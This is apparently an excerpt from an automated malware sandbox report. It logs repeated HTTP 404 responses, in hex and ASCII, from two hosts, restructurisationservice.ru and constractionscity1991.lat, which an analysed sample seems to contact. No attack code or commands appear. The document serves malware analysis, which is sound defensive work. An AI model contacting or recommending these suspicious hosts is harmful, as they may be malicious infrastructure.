                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 09:59:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:00:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:00:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:00:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:00:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:00:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:00:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:00:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:00:33 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:00:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:00:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:00:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 